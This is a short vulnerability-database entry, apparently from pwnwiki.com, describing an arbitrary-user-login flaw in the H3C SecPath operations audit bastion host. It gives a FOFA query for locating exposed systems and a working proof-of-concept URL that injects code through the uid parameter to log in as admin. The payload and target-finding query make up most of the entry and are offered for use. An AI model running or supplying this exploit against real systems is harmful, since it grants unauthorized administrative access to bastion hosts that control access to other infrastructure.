◆◆0

H3C-SecPath-运维审计系统(堡垒机) 任意用户登录漏洞

pwnwiki.com

,

影响版本

2018

FOFA

app="H3C-SecPath-运维审计系统"

POC

http://target/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin

参考

https://github.com/EdgeSecurityTeam/Vulnerability/blob/main/H3C-SecPath-%E8%BF%90%E7%BB%B4%E5%AE%A1%E8%AE%A1%E7%B3%BB%E7%BB%9F(%E5%A0%A1%E5%9E%92%E6%9C%BA)%E4%BB%BB%E6%84%8F%E7%94%A8%E6%88%B7%E7%99%BB%E5%BD%95.md

PWNWIK.COM==免费、自由、人人可编辑的漏洞库

返回顶部